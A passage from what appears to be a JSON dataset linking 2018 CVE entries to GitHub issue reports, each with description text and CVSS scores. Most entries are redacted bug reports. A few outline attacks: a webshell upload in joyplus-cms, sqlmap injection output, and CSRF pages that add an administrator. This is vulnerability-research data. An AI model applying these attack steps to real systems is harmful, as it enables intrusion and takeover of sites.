  22131. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26625",
  22132. "Repo_new": "twbs/bootstrap",
  22133. "Issue_Created_At": "2018-05-29T15:47:48Z",
  22134. "description": "XSS possible in collapse data parent attribute. XSS possible in collapse data parent attribute ERRORTAG Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22136. "severity": "MEDIUM",
  22137. "baseScore": 6.1,
  22138. "impactScore": 2.7,
  22139. "exploitabilityScore": 2.8
  22140. },
  22141. {
  22142. "CVE_ID": "CVE-2018-14040",
  22143. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26423",
  22144. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26423",
  22145. "Repo_new": "twbs/bootstrap",
  22146. "Issue_Created_At": "2018-04-30T15:28:45Z",
  22147. "description": "NUMBERTAG ship list. Highlights CSS JS Docs Build tools",
  22148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22149. "severity": "MEDIUM",
  22150. "baseScore": 6.1,
  22151. "impactScore": 2.7,
  22152. "exploitabilityScore": 2.8
  22153. },
  22154. {
  22155. "CVE_ID": "CVE-2018-14041",
  22156. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26627",
  22157. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26627",
  22158. "Repo_new": "twbs/bootstrap",
  22159. "Issue_Created_At": "2018-05-29T20:09:52Z",
  22160. "description": "XSS possible in data target property of scrollspy. XSS possible in scrollspy data target attribute data target=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22162. "severity": "MEDIUM",
  22163. "baseScore": 6.1,
  22164. "impactScore": 2.7,
  22165. "exploitabilityScore": 2.8
  22166. },
  22167. {
  22168. "CVE_ID": "CVE-2018-14042",
  22169. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26628",
  22170. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26628",
  22171. "Repo_new": "twbs/bootstrap",
  22172. "Issue_Created_At": "2018-05-29T22:30:20Z",
  22173. "description": "XSS possible in data container property of tooltip. XSS possible in tooltip data container attribute data container=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
  22174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22175. "severity": "MEDIUM",
  22176. "baseScore": 6.1,
  22177. "impactScore": 2.7,
  22178. "exploitabilityScore": 2.8
  22179. },
  22180. {
  22181. "CVE_ID": "CVE-2018-14043",
  22182. "Issue_Url_old": "https://github.com/Monetra/mstdlib/issues/2",
  22183. "Issue_Url_new": "https://github.com/monetra/mstdlib/issues/2",
  22184. "Repo_new": "monetra/mstdlib",
  22185. "Issue_Created_At": "2018-07-12T14:08:40Z",
  22186. "description": "APITAG File: PATHTAG L NUMBERTAG i.e APITAG I believe this indicates a security flaw. If an attacker can change anything along the path between the call APITAG and the files actually used, the attacker may exploit the race condition. Request team to have a look and validate.",
  22187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22188. "severity": "CRITICAL",
  22189. "baseScore": 9.8,
  22190. "impactScore": 5.9,
  22191. "exploitabilityScore": 3.9
  22192. },
  22193. {
  22194. "CVE_ID": "CVE-2018-14046",
  22195. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/378",
  22196. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/378",
  22197. "Repo_new": "exiv2/exiv2",
  22198. "Issue_Created_At": "2018-07-09T01:52:51Z",
  22199. "description": "APITAG heap buffer overflow PATHTAG APITAG long). exi NUMBERTAG pp $POC APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG a NUMBERTAG fc0e bp NUMBERTAG fff NUMBERTAG cdcc NUMBERTAG sp NUMBERTAG fff NUMBERTAG cdcbf0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG a NUMBERTAG fc0d in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG cbe in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a9f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG long) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING NUMBERTAG poc heapoverflow URLTAG",
  22200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22201. "severity": "HIGH",
  22202. "baseScore": 8.8,
  22203. "impactScore": 5.9,
  22204. "exploitabilityScore": 2.8
  22205. },
  22206. {
  22207. "CVE_ID": "CVE-2018-14047",
  22208. "Issue_Url_old": "https://github.com/pngwriter/pngwriter/issues/129",
  22209. "Issue_Url_new": "https://github.com/pngwriter/pngwriter/issues/129",
  22210. "Repo_new": "pngwriter/pngwriter",
  22211. "Issue_Created_At": "2018-07-11T11:49:30Z",
  22212. "description": "SEGV in function pngwriter::readfromfile. I use Clang NUMBERTAG and APITAG to build pngwriter NUMBERTAG this file URLTAG can cause SEGV signal when running the test blackwhite in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22213. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22214. "severity": "MEDIUM",
  22215. "baseScore": 5.5,
  22216. "impactScore": 3.6,
  22217. "exploitabilityScore": 1.8
  22218. },
  22219. {
  22220. "CVE_ID": "CVE-2018-14048",
  22221. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/238",
  22222. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/238",
  22223. "Repo_new": "glennrp/libpng",
  22224. "Issue_Created_At": "2018-07-12T04:16:47Z",
  22225. "description": "SEGV in function png_free_data. Hi, all! We found a bug in libpng NUMBERTAG when using pngwriter URLTAG , which takes libpng as a dependency. You can get more information by referring to this URLTAG !",
  22226. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22227. "severity": "MEDIUM",
  22228. "baseScore": 6.5,
  22229. "impactScore": 3.6,
  22230. "exploitabilityScore": 2.8
  22231. },
  22232. {
  22233. "CVE_ID": "CVE-2018-14049",
  22234. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/22",
  22235. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/22",
  22236. "Repo_new": "marc-q/libwav",
  22237. "Issue_Created_At": "2018-07-12T11:39:53Z",
  22238. "description": "SEGV in function print_info in wav_info.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22240. "severity": "MEDIUM",
  22241. "baseScore": 6.5,
  22242. "impactScore": 3.6,
  22243. "exploitabilityScore": 2.8
  22244. },
  22245. {
  22246. "CVE_ID": "CVE-2018-14050",
  22247. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/20",
  22248. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/20",
  22249. "Repo_new": "marc-q/libwav",
  22250. "Issue_Created_At": "2018-07-12T11:31:06Z",
  22251. "description": "SEGV in function wrap_free in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
  22252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22253. "severity": "MEDIUM",
  22254. "baseScore": 6.5,
  22255. "impactScore": 3.6,
  22256. "exploitabilityScore": 2.8
  22257. },
  22258. {
  22259. "CVE_ID": "CVE-2018-14051",
  22260. "Issue_Url_old": "https://github.com/marc-q/libwav/issues/21",
  22261. "Issue_Url_new": "https://github.com/marc-q/libwav/issues/21",
  22262. "Repo_new": "marc-q/libwav",
  22263. "Issue_Created_At": "2018-07-12T11:33:52Z",
  22264. "description": "Infinite loop in wav_read in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause infinite loop in function APITAG when running the APITAG in folder APITAG with the following command: APITAG Here is the gdb information: CODETAG The infinite loop is caused by this: ERRORTAG",
  22265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22266. "severity": "HIGH",
  22267. "baseScore": 7.5,
  22268. "impactScore": 3.6,
  22269. "exploitabilityScore": 3.9
  22270. },
  22271. {
  22272. "CVE_ID": "CVE-2018-14063",
  22273. "Issue_Url_old": "https://github.com/tracto2/Tracto-ERC20/issues/1",
  22274. "Issue_Url_new": "https://github.com/tracto2/tracto-erc20/issues/1",
  22275. "Repo_new": "tracto2/tracto-erc20",
  22276. "Issue_Created_At": "2018-07-13T12:59:27Z",
  22277. "description": "Integer overflow in APITAG I found an integer overflow in APITAG APITAG it doesn't use the safe function to add value. code address: URLTAG vuln code: ERRORTAG Before overflow FILETAG After adding value APITAG FILETAG Discovered by zhihua. EMAILTAG .cn",
  22278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22279. "severity": "CRITICAL",
  22280. "baseScore": 9.8,
  22281. "impactScore": 5.9,
  22282. "exploitabilityScore": 3.9
  22283. },
  22284. {
  22285. "CVE_ID": "CVE-2018-14065",
  22286. "Issue_Url_old": "https://github.com/PHPOffice/PHPWord/issues/1421",
  22287. "Issue_Url_new": "https://github.com/phpoffice/phpword/issues/1421",
  22288. "Repo_new": "phpoffice/phpword",
  22289. "Issue_Created_At": "2018-07-11T03:50:58Z",
  22290. "description": "A vulnerability in APITAG Hi! I found a vulnerability in APITAG how can I report it to you?",
  22291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22292. "severity": "CRITICAL",
  22293. "baseScore": 9.8,
  22294. "impactScore": 5.9,
  22295. "exploitabilityScore": 3.9
  22296. },
  22297. {
  22298. "CVE_ID": "CVE-2018-14068",
  22299. "Issue_Url_old": "https://github.com/martinzhou2015/SRCMS/issues/20",
  22300. "Issue_Url_new": "https://github.com/martinzhou2015/srcms/issues/20",
  22301. "Repo_new": "martinzhou2015/srcms",
  22302. "Issue_Created_At": "2018-07-13T01:53:21Z",
  22303. "description": "There are two CSRF vulnerabilities that can add an administrator account. After the administrator has logged in, open the following two page poc\uff1a FILETAG CODETAG FILETAG CODETAG",
  22304. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22305. "severity": "HIGH",
  22306. "baseScore": 8.8,
  22307. "impactScore": 5.9,
  22308. "exploitabilityScore": 2.8
  22309. },
  22310. {
  22311. "CVE_ID": "CVE-2018-14071",
  22312. "Issue_Url_old": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
  22313. "Issue_Url_new": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
  22314. "Repo_new": "cyberhobo/wordpress-geo-mashup",
  22315. "Issue_Created_At": "2018-07-12T03:19:31Z",
  22316. "description": "Strengthen sanitization. Make sure all post editor and other user input is sanitized before use.",
  22317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22318. "severity": "CRITICAL",
  22319. "baseScore": 9.8,
  22320. "impactScore": 5.9,
  22321. "exploitabilityScore": 3.9
  22322. },
  22323. {
  22324. "CVE_ID": "CVE-2018-14072",
  22325. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/67",
  22326. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/67",
  22327. "Repo_new": "saitoha/libsixel",
  22328. "Issue_Created_At": "2018-07-14T01:39:16Z",
  22329. "description": "Memory leak detected. Memory leaks detected when running program sixel2png the input file is APITAG with address sanitizer. ERRORTAG",
  22330. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22331. "severity": "HIGH",
  22332. "baseScore": 7.5,
  22333. "impactScore": 3.6,
  22334. "exploitabilityScore": 3.9
  22335. },
  22336. {
  22337. "CVE_ID": "CVE-2018-14329",
  22338. "Issue_Url_old": "https://github.com/samtools/htslib/issues/736",
  22339. "Issue_Url_new": "https://github.com/samtools/htslib/issues/736",
  22340. "Repo_new": "samtools/htslib",
  22341. "Issue_Created_At": "2018-07-15T07:06:13Z",
  22342. "description": "APITAG Team, File: PATHTAG CODETAG I believe this indicates a security flaw, If an attacker can change anything along the path between the call APITAG and the files actually used, attacker may exploit the race condition. Request team to have a look and validate.",
  22343. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  22344. "severity": "MEDIUM",
  22345. "baseScore": 4.7,
  22346. "impactScore": 3.6,
  22347. "exploitabilityScore": 1.0
  22348. },
  22349. {
  22350. "CVE_ID": "CVE-2018-14332",
  22351. "Issue_Url_old": "https://github.com/clementine-player/Clementine/issues/6078",
  22352. "Issue_Url_new": "https://github.com/clementine-player/clementine/issues/6078",
  22353. "Repo_new": "clementine-player/clementine",
  22354. "Issue_Created_At": "2018-06-06T22:18:50Z",
  22355. "description": "Clementine often crashes when playing ogg files APITAG fault core dumped, qt5). System information Operating System: Arch Linux Clementine version: clementine qt5 git Expected behavior / actual behavior Clementine often crashes while playing ogg files. Sometimes as many times as once per song. (I would play an album, such as URLTAG , Clementine crashes, I start it back up and play so that the same song restarts, then it seems to crash on the next one.) I think this has been happening for a long time, I've part of using Clementine, but it seems more consistent now so maybe identifiable (I don't know if that's because I've been listening to a lot of ogg albums from FILETAG or a regression) Looking at the terminal output I thought it may have been the writing statistics to file bit or lastfm, but it still crashes without these. Here is some log URLTAG (from $ APITAG ), I don't know if it's relevant or the segfault occurs independently later. I will keep trying with different settings and types of files and keep posting if I find anything.",
  22356. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22357. "severity": "MEDIUM",
  22358. "baseScore": 5.5,
  22359. "impactScore": 3.6,
  22360. "exploitabilityScore": 1.8
  22361. },
  22362. {
  22363. "CVE_ID": "CVE-2018-14334",
  22364. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/428",
  22365. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/428",
  22366. "Repo_new": "joyplus/joyplus-cms",
  22367. "Issue_Created_At": "2018-07-16T04:06:53Z",
  22368. "description": "Joyplus cms NUMBERTAG has an arbitrary file upload vulnerability, leading to getshell. First, add a shortcut menu. FILETAG Second, switch to the home menu. FILETAG Third, you will find a file upload and upload a webshell. FILETAG Last, use Cknife to connect to the shell. FILETAG success~ From the PATHTAG FILETAG As the picture shows, the developer has set whitelist restrictions, but does not exit the file upload process. Fix: You should exit the script when illegal files are detected",
  22369. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22370. "severity": "CRITICAL",
  22371. "baseScore": 9.8,
  22372. "impactScore": 5.9,
  22373. "exploitabilityScore": 3.9
  22374. },
  22375. {
  22376. "CVE_ID": "CVE-2018-14337",
  22377. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4062",
  22378. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4062",
  22379. "Repo_new": "mruby/mruby",
  22380. "Issue_Created_At": "2018-06-25T15:27:56Z",
  22381. "description": "Signed integer overflow in mrb_str_format. The check macro (in APITAG ) contains a signed integer overflow in bsize : ERRORTAG APITAG can become negative. However with APITAG the APITAG is never triggered, since bsiz is a signed integer. Signed integer overflows are undefined behaviour and thus gcc removes the check. This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in an oversized string that allows access to arbitrary memory. In our experiments building with gcc in version APITAG produces the vulnerable binary while clang generated a safe executable. CODETAG Reproduce: CODETAG Backtrace in gdb : CODETAG Credits: This issue was reported by Sergej Schumilo, Daniel Teuchert and Cornelius Aschermann. Impact This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in an oversized string that allows access to arbitrary memory.",
  22382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  22383. "severity": "HIGH",
  22384. "baseScore": 7.5,
  22385. "impactScore": 3.6,
  22386. "exploitabilityScore": 3.9
  22387. },
  22388. {
  22389. "CVE_ID": "CVE-2018-14338",
  22390. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/382",
  22391. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/382",
  22392. "Repo_new": "exiv2/exiv2",
  22393. "Issue_Created_At": "2018-07-14T15:29:09Z",
  22394. "description": "APITAG at APITAG File: geotag.cpp CODETAG and ERRORTAG According to the documentation of APITAG the output buffer needs to be at least of size APITAG specifying output buffers large enough to handle the maximum size possible result from path manipulation functions. In that instance, buf's size comes from APITAG . That function attempts to use APITAG as noted in the realpath NUMBERTAG docs. But over here APITAG nor APITAG is used. Passing an inadequately sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include APITAG APITAG APITAG and others.",
  22395. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22396. "severity": "HIGH",
  22397. "baseScore": 8.1,
  22398. "impactScore": 5.9,
  22399. "exploitabilityScore": 2.2
  22400. },
  22401. {
  22402. "CVE_ID": "CVE-2018-14371",
  22403. "Issue_Url_old": "https://github.com/javaserverfaces/mojarra/issues/4364",
  22404. "Issue_Url_new": "https://github.com/javaserverfaces/mojarra/issues/4364",
  22405. "Repo_new": "javaserverfaces/mojarra",
  22406. "Issue_Created_At": "2018-04-17T15:15:17Z",
  22407. "description": "Where Can I Report Security Vulnerability?. I found a vulnerability in the latest version of Mojarra (vulnerable by default). But I can't find any security related mail from websites. Where can I report my finding?",
  22408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  22409. "severity": "HIGH",
  22410. "baseScore": 7.5,
  22411. "impactScore": 3.6,
  22412. "exploitabilityScore": 3.9
  22413. },
  22414. {
  22415. "CVE_ID": "CVE-2018-14381",
  22416. "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/905",
  22417. "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/905",
  22418. "Repo_new": "pagekit/pagekit",
  22419. "Issue_Created_At": "2018-07-05T08:52:07Z",
  22420. "description": "Open redirect vulnerability in /user/login?redirect=. Technical Details Pagekit version NUMBERTAG Web server: Apache Database: Mysql PHP Version NUMBERTAG Hello, I found an open redirect vulnerability. Detail: After a user logs in, accessing this url URLTAG will redirect to google. Author: zhihua.yao from APITAG",
  22421. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22422. "severity": "MEDIUM",
  22423. "baseScore": 6.1,
  22424. "impactScore": 2.7,
  22425. "exploitabilityScore": 2.8
  22426. },
  22427. {
  22428. "CVE_ID": "CVE-2018-14387",
  22429. "Issue_Url_old": "https://github.com/robiso/wondercms/issues/64",
  22430. "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/64",
  22431. "Repo_new": "wondercms/wondercms",
  22432. "Issue_Created_At": "2018-07-18T12:32:14Z",
  22433. "description": "Session Fixation. Wonder CMS NUMBERTAG is prone to a session fixation attack. APITAG A Session Fixation attack fixes a session on the victim's browser, so the attack starts before the user logs in NUMBERTAG An attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to authenticate against the server using the same session identifier. APITAG attacker can access the user's account through the active session APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existing session ID. Let's see the session values before login FILETAG Session Values after Login: FILETAG Mitigation: The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another APITAG",
  22434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22435. "severity": "HIGH",
  22436. "baseScore": 8.8,
  22437. "impactScore": 5.9,
  22438. "exploitabilityScore": 2.8
  22439. },
  22440. {
  22441. "CVE_ID": "CVE-2018-14388",
  22442. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/429",
  22443. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/429",
  22444. "Repo_new": "joyplus/joyplus-cms",
  22445. "Issue_Created_At": "2018-07-16T10:19:16Z",
  22446. "description": "joyplus cms NUMBERTAG FILETAG has new Cross Site Scripting: requests:. requests: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG &t_sort NUMBERTAG t_des=test FILETAG FILETAG",
  22447. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  22448. "severity": "MEDIUM",
  22449. "baseScore": 5.4,
  22450. "impactScore": 2.7,
  22451. "exploitabilityScore": 2.3
  22452. },
  22453. {
  22454. "CVE_ID": "CVE-2018-14389",
  22455. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/430",
  22456. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/430",
  22457. "Repo_new": "joyplus/joyplus-cms",
  22458. "Issue_Created_At": "2018-07-16T11:01:41Z",
  22459. "description": "joyplus cms NUMBERTAG FILETAG has SQL Injection. requests:GET PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded X Requested With: APITAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close sqlmap: FILETAG sqlmap identified the following injection point(s) with a total of NUMBERTAG HTTP(s) requests: Parameter: val (GET) Type: boolean based blind Title: APITAG NUMBERTAG boolean based blind Parameter replace Payload: APITAG (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE NUMBERTAG SELECT NUMBERTAG FROM APITAG END)) Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: APITAG UNION ALL SELECT APITAG APITAG web server operating system: Windows web application technology: Apache NUMBERTAG PHP NUMBERTAG back end DBMS: APITAG NUMBERTAG",
  22460. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22461. "severity": "CRITICAL",
  22462. "baseScore": 9.8,
  22463. "impactScore": 5.9,
  22464. "exploitabilityScore": 3.9
  22465. },
  22466. {
  22467. "CVE_ID": "CVE-2018-14401",
  22468. "Issue_Url_old": "https://github.com/jjanier/axml/issues/1",
  22469. "Issue_Url_new": "https://github.com/jjanier/axml/issues/1",
  22470. "Repo_new": "jjanier/axml",
  22471. "Issue_Created_At": "2018-07-17T12:11:29Z",
  22472. "description": "Out of bound read leads to a program crash. When loading the poc file with gdb, I found that it calls the APITAG function to copy file data to a memory buf. But the APITAG is out of memory, which could lead to a crash ERRORTAG The poc and the binary APITAG",
  22473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22474. "severity": "HIGH",
  22475. "baseScore": 7.5,
  22476. "impactScore": 3.6,
  22477. "exploitabilityScore": 3.9
  22478. },
  22479. {
  22480. "CVE_ID": "CVE-2018-14402",
  22481. "Issue_Url_old": "https://github.com/ytsutano/axmldec/issues/4",
  22482. "Issue_Url_new": "https://github.com/ytsutano/axmldec/issues/4",
  22483. "Repo_new": "ytsutano/axmldec",
  22484. "Issue_Created_At": "2018-07-17T12:38:51Z",
  22485. "description": "Access to invalid memory leads to a crash. When loading the poc file with gdb, I found that it calls the APITAG function, and it accesses memory using rax's value APITAG but APITAG , this could lead to a crash ERRORTAG The binary and poc APITAG",
  22486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  22487. "severity": "HIGH",
  22488. "baseScore": 7.5,
  22489. "impactScore": 3.6,
  22490. "exploitabilityScore": 3.9
  22491. },
  22492. {
  22493. "CVE_ID": "CVE-2018-14415",
  22494. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/28",
  22495. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/28",
  22496. "Repo_new": "idreamsoft/iCMS",
  22497. "Issue_Created_At": "2018-07-17T10:48:17Z",
  22498. "description": "Cross Site Scripting. First Enter the page APITAG and the payload is: FILETAG Then,we can see the result. FILETAG",
  22499. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22500. "severity": "MEDIUM",
  22501. "baseScore": 6.1,
  22502. "impactScore": 2.7,
  22503. "exploitabilityScore": 2.8
  22504. },
  22505. {
  22506. "CVE_ID": "CVE-2018-14422",
  22507. "Issue_Url_old": "https://github.com/thm/SansCMS/issues/7",
  22508. "Issue_Url_new": "https://github.com/thm/sanscms/issues/7",
  22509. "Repo_new": "thm/SansCMS",
  22510. "Issue_Created_At": "2017-09-06T14:43:58Z",
  22511. "description": "XSS in PATHTAG Here is a xss in PATHTAG about parameter q. POC: APITAG This poc will pop a window in APITAG browser.",
  22512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22513. "severity": "MEDIUM",
  22514. "baseScore": 6.1,
  22515. "impactScore": 2.7,
  22516. "exploitabilityScore": 2.8
  22517. },
  22518. {
  22519. "CVE_ID": "CVE-2018-14435",
  22520. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1193",
  22521. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1193",
  22522. "Repo_new": "imagemagick/imagemagick",
  22523. "Issue_Created_At": "2018-07-04T05:52:15Z",
  22524. "description": "coders/pcd.c APITAG potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug is located in coders/pcd.c Steps to Reproduce the bug is located in FILETAG : APITAG function. the code fragment is as follows: we allocate buffer memory, we freed it in the normal branch\uff0cbut forgot to free it in the exception branch URLTAG ERRORTAG but we forget to free it in URLTAG ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
